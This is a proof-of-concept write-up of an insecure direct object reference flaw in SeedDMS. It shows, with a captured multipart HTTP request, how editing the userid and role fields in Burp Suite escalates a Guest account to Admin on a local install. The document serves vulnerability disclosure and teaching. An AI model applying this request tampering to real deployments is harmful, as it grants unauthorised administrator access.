Insecure Direct Object Reference (IDOR) is a type of access control vulnerability that occurs when an application allows users to access or modify objects by directly manipulating identifiers, such as URLs or parameters, without proper authorization checks. This vulnerability can lead to unauthorized access to sensitive data or functionality, often resulting in horizontal or vertical privilege escalation.
This IDOR vulnerability allows a Guest user to change upgrade his permissions to that of an Admin by changing
useridparameter androleparameter.
Create two users namely sunil and aman on the endpoint: http://localhost/seeddms/out/out.UsrMgr.php
Check list of users at http://localhost/seeddms/out/out.UserList.php
In our case, userid of aman is 5 and userid of sunil is 6. (This can be checked by hovering over or clicking the edit button (the userid appears in the url)
Go to the endpoint http://localhost/seeddms/out/out.UsrMgr.php?userid=5 and edit the Role to Guest. (Change the userid parameter in the url as per your userid parameters)
Capture the request in BurpSuite (or OWASP ZAP) as you click on the Save Button.
You will get a request like this:
POST /seeddms/op/op.UsrMgr.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------113135331919090313053417803191
Content-Length: 1743
Origin: <http://localhost>
Connection: close
Referer: <http://localhost/seeddms/out/out.UsrMgr.php?userid=5>
Cookie: mydms_session=143fc0cdf34a682256baae37abda8ce2
Upgrade-Insecure-Requests: 1
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="formtoken"
519192f812db211d797f140b67255d03
**-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="userid"
5**
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="action"
edituser
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="login"
aman
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwd"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdconf"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="pwdexpiration"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="name"
Aman User
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="email"
[email protected]
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="comment"
**-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="role"
2**
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="homefolder"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="targetname13e65f6ab355d3a32705b2e99987d414"
-----------------------------113135331919090313053417803191
Content-Disposition: form-data; name="quota"
0
-----------------------------113135331919090313053417803191--
Change the userid from 5 to 6 and role from 2 to 1. This changes user from Aman to Sunil and the assigned role from Guest to Admin.
Now forward the request, and switch off the proxy.
You'll get an output like this in the web browser:
This shows that instead of Aman (userid=5), the details of Sunil (userid=6) has been updated and the role of sunil has also been updated to Admin instead of Guest.